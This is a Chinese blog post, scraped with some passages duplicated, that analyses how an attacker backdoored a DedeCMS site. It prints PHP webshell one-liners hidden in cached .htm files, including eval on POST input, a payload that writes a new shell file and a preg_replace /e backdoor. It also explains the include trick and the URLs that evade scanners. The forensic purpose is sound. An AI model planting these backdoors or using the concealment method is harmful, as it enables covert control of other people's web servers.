• 2013/06/28作者: admin
一種奇特的DEDE隱藏後門辦法
單位某站用的dedecms,今天被某黑闊getshell了,提交到了wooyun.
爲了還原黑闊入侵的手法,用鬼哥的getshell測試居然沒成功, 是不是getshell過一次,再次就不會成功呢?
無奈只能打包代碼,用各種webshell掃描器只掃到一個data/tplcache/xxxxx.inc文件,文件代碼如下:
Default
轉自:http://www.91ri.org/6462.html
一種奇特的DEDE隱藏後門辦法單位某站用的dedecms,今天被某黑闊getshell了,提交到了wooyun. 爲了還原黑闊入侵的手法,用鬼哥的getshell測試居然沒成功, 是不是getshell過一次,再次就不會成功呢? 無奈只能打包代碼,用各種webshell掃描器只掃到一個data/tplcache/xxxxx.inc文件,文件代碼如下:
Default
但是翻遍所有的Web目錄也沒有找到90sec.php文件,有朋友指點說可能是其它文件include這個文件。然後又用Seay的代碼審計工具定義關鍵字各種掃,還是沒找到。 最後老大翻到data/cache目錄下發現了幾個htm文件,myad-1.htm,myad-16.htm,mytag-1208.htm等,打開這些html文件,代碼分別如下:
Default
Default
Default
看到這幾個文件很奇怪,不知道黑闊要幹嘛??雖然代碼看似很熟悉,但是HTML文件能當後門用麼?想起之前朋友說的include,然後結合前段時 間的getshell漏洞利用細節,最終翻到plus/mytag_js.php文件,在這個文件裏終於發現黑闊無節操的地方,主要代碼如下: 看到上面的代碼我們應該知道黑闊是多麼的邪惡,在生成的htm格式的cache文件中寫入各種類型的一句話代碼,然後再修改 plus/ad_js.php和mytag_js.php文件,包含htm格式的cache文件。這樣黑闊只需要在菜刀中填入以下URL就可以連接一句話 了. http://www.91ri.org /plus/mytag_js.php?id=1208 http://www.91ri.org /plus/ad_js.php?id=1 具體的id以及文件名跟data/cache目錄下的myad-1.htm,mytag-1208.htm是有關係的。因此各種webshell掃描器都沒有掃到webshell後門文件,因爲很多默認都不對htm進行掃描. 不怎麼懂php,所以分析可能有差錯的地方,歡迎指正 |
但是翻遍所有的Web目錄也沒有找到90sec.php文件,有朋友指點說可能是其它文件include這個文件。然後又用Seay的代碼審計工具定義關鍵字各種掃,還是沒找到。
最後老大翻到data/cache目錄下發現了幾個htm文件,myad-1.htm,myad-16.htm,mytag-1208.htm等,打開這些html文件,代碼分別如下:
Default
1 2 3 4 |
<!–
document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”); –> |
Default
1 2 3 4 5 |
<!–
document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);
–> |
Default
1 2 3 |
<!– document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST['guige'],’error’);?>”); –> |
看到這幾個文件很奇怪,不知道黑闊要幹嘛??雖然代碼看似很熟悉,但是HTML文件能當後門用麼?想起之前朋友說的include,然後結合前段時 間的getshell漏洞利用細節,最終翻到plus/mytag_js.php文件,在這個文件裏終於發現黑闊無節操的地方,主要代碼如下:
看到上面的代碼我們應該知道黑闊是多麼的邪惡,在生成的htm格式的cache文件中寫入各種類型的一句話代碼,然後再修改 plus/ad_js.php和mytag_js.php文件,包含htm格式的cache文件。這樣黑闊只需要在菜刀中填入以下URL就可以連接一句話 了.
http://www.91ri.org /plus/mytag_js.php?id=1208
http://www.91ri.org /plus/ad_js.php?id=1
具體的id以及文件名跟data/cache目錄下的myad-1.htm,mytag-1208.htm是有關係的。因此各種webshell掃描器都沒有掃到webshell後門文件,因爲很多默認都不對htm進行掃描.
不怎麼懂php,所以分析可能有差錯的地方,歡迎指正!
link:http://www.nxadmin.com/penetration/1168.html